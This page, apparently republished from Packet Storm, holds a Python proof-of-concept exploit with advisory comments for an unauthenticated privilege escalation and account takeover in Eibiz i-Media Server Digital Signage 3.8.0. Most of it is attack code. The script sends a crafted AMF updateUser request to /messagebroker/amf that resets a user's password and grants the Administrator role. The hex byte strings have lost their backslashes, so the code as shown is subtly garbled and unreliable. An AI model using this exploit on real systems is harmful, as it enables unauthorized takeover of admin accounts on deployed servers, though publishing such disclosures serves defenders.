Exploit/Advisories

Published on August 22nd, 2020 📆 | 6425 Views ⚑

0

Eibiz i-Media Server Digital Signage 3.8.0 Remote Privilege Escalation / Account Takeover ≈ Packet Storm


Text to Speech

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Eibiz i-Media Server Digital Signage 3.8.0 Remote Privilege Escalation / Account Takeover
#
#
# Vendor: EIBIZ Co.,Ltd.
# Product web page: http://www.eibiz.co.th
# Affected version: < =3.8.0
#
# Summary: EIBIZ develop advertising platform for out of home media in that
# time the world called "Digital Signage". Because most business customers
# still need get outside to get in touch which products and services. Online
# media alone cannot serve them right place, right time.
#
# Desc: The application suffers from an unauthenticated remote privilege escalation
# and account takeover vulnerability that can be triggered by directly calling the
# updateUser object (part of ActionScript object graphs), effectively elevating to
# an administrative role or taking over an existing account by modifying the settings.
#
# Tested on: Windows Server 2016
# Windows Server 2012 R2
# Windows Server 2008 R2
# Apache Flex
# Apache Tomcat/6.0.14
# Apache-Coyote/1.1
# BlazeDS Application
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5584
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5584.php
#
#
# 26.07.2020
#
#

import requests
import sys#####|
import re##### |
############# |
############ |
########### |
########## |
######### |
######## |
####### |
###### |
##### |
#PoC |
### |
## |
# |
class Escalada:

def __init__(self):
self.session = "11111111112222222222333333333344"
self.agent = "DigitalSigner/25.1"
self.display = "Intruder Alert"
self.ep = "/messagebroker/amf"
self.suprole = "Designer"
self.serialize = None
self.address = None
self.usrname = None
self.passwrd = None
self.headers = None

def usage(self):
if len(sys.argv) < 5:
print("i-Media Server Digital Signage 3.8.0 Privilege Escalation")
print("Usage: ./poc.py [ip] [username] [password] [displayname] [role]")
print("Example: ./poc.py 192.168.1.1 testingus 111111 Backdoor Administrator")
exit(21)
else:
self.address = sys.argv[1]
self.usrname = sys.argv[2]
self.passwrd = sys.argv[3]
self.display = sys.argv[4]
self.suprole = (bytes("Administrator".encode("utf-8")) if len(sys.argv) < 6 else sys.argv[5])
#__
# | Administrator __
# | Designer __
# | Reporter __
# | Approver
if not "http" in self.address:
self.address = "http://{}".format(self.address)

def amf(self):
self.cookies = {"JSESSIONID" : self.session} # not really needed
self.headers = {"User-Agent" : self.agent,
"Accept" : "*/*",
"Accept-Language" : "en-US,en;q=0.5",
"Accept-Encoding" : "gzip, deflate",
"Origin" : self.address,
"Connection" : "close",
"Referer" : self.address + "/main.swf",
"Content-Type" : "application/x-amf"}

self.serialize = b"x00x03x00x00x00x01x00x04x6Ex75x6Cx6C"
self.serialize += b"x00x03x2Fx35x38x00x00x01xFEx0Ax00x00"
self.serialize += b"x00x01x11x0Ax81x13x4Fx66x6Cx65x78x2E"
self.serialize += b"x6Dx65x73x73x61x67x69x6Ex67x2Ex6Dx65"
self.serialize += b"x73x73x61x67x65x73x2Ex52x65x6Dx6Fx74"
self.serialize += b"x69x6Ex67x4Dx65x73x73x61x67x65x0Dx73"
self.serialize += b"x6Fx75x72x63x65x13x6Fx70x65x72x61x74"
self.serialize += b"x69x6Fx6Ex13x6Dx65x73x73x61x67x65x49"
self.serialize += b"x64x13x74x69x6Dx65x73x74x61x6Dx70x09"
self.serialize += b"x62x6Fx64x79x11x63x6Cx69x65x6Ex74x49"
self.serialize += b"x64x17x64x65x73x74x69x6Ex61x74x69x6F"
self.serialize += b"x6Ex15x74x69x6Dx65x54x6Fx4Cx69x76x65"
self.serialize += b"x0Fx68x65x61x64x65x72x73x01x06x15x75"
self.serialize += b"x70x64x61x74x65x55x73x65x72x06x49x31"
self.serialize += b"x42x38x39x37x41x38x36x2Dx37x33x42x45"
self.serialize += b"x2Dx30x35x42x31x2Dx43x45x42x33x2Dx41"
self.serialize += b"x30x35x35x30x39x36x34x31x31x34x34x04"
self.serialize += b"x00x09x05x01x0Ax81x73x1Bx64x73x2Ex6D"
self.serialize += b"x6Fx64x65x6Cx2Ex55x73x65x72x11x70x61"
self.serialize += b"x73x73x77x6Fx72x64x0Dx63x72x65x61x74"
self.serialize += b"x65x07x74x65x6Cx07x66x61x78x09x6Ex61"
self.serialize += b"x6Dx65x0Fx61x64x64x72x65x73x73x0Dx75"
self.serialize += b"x70x64x61x74x65x05x69x64x0Dx6Dx6Fx62"
self.serialize += b"x69x6Cx65x0Fx75x44x65x6Cx65x74x65x15"
self.serialize += b"x64x65x70x61x72x74x6Dx65x6Ex74x09x72"
self.serialize += b"x6Fx6Cx65x09x72x65x61x64x0Bx65x6Dx61"
self.serialize += b"x69x6Cx0Fx63x6Fx6Dx70x61x6Ex79x06" #-"

self.bytecount = len(self.passwrd * 2) + 1
self.bytesdata = [self.bytecount]
self.serialize += "".join(map(chr, self.bytesdata))

self.serialize += (bytes(self.passwrd.encode("utf-8"))) #-----------"
self.serialize += b"x03x06x19x31x31x31x2Dx32x32x32x2Dx33"
self.serialize += b"x33x33x33x06x19x33x33x33x2Dx32x32x32"
self.serialize += b"x2Dx31x31x31x31x06" #---------------------"

self.bytecount = len(self.display * 2) + 1
self.bytesdata = [self.bytecount]
self.serialize += "".join(map(chr, self.bytesdata))





self.serialize += (bytes(self.display.encode("utf-8"))) #-----------"
self.serialize += b"x06x1Fx49x6Dx61x67x69x6Ex61x72x79x53"
self.serialize += b"x74x72x65x65x74x03x06" #-----------------"

self.bytecount = len(self.usrname * 2) + 1
self.bytesdata = [self.bytecount]
self.serialize += "".join(map(chr, self.bytesdata))

self.serialize += (bytes(self.usrname.encode("utf-8"))) #-----------"
self.serialize += b"x06x01x03x06x11x53x65x63x75x72x69x74"
self.serialize += b"x79x06" #-------------------------------------"

self.bytecount = len(self.suprole * 2) + 1
self.bytesdata = [self.bytecount]
self.serialize += "".join(map(chr, self.bytesdata))

self.serialize += (bytes(self.suprole.encode("utf-8"))) #-----------"
self.serialize += b"x03x06x15x7Ax73x6Cx40x77x68x61x2Ex62"
self.serialize += b"x61x06x07x5Ax53x4Cx06x42x01x06x17x75"
self.serialize += b"x73x65x72x53x65x72x76x69x63x65x04x00"
self.serialize += b"x0Ax0Bx01x09x44x53x49x64x06x49x34x41"
self.serialize += b"x35x46x33x33x43x33x2Dx37x31x31x46x2D"
self.serialize += b"x35x38x45x38x2Dx39x30x35x30x2Dx39x35"
self.serialize += b"x44x31x30x30x46x33x44x45x33x45x15x44"
self.serialize += b"x53x45x6Ex64x70x6Fx69x6Ex74x06x0Dx6D"
self.serialize += b"x79x2Dx61x6Dx66x01" #---------------------"

print("First try...")
req = requests.post(self.address + self.ep, headers=self.headers, cookies=self.cookies, data=self.serialize)
#print(req.text.encode("utf-8"))
if "Detected duplicate HTTP-based FlexSessions" in req.text:
print("Second try...")
req = requests.post(self.address + self.ep, headers=self.headers, cookies=self.cookies, data=self.serialize)
#print(req.text.encode("utf-8"))
if "AcknowledgeMessage" in req.text:
print("You are " + self.suprole + " now!")
else:
print("Didn't work.")
exit(0)
else:
print("Try again!")

def main(self):
self.usage()
self.amf()

if __name__ == '__main__':
Escalada().main()

Source link

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑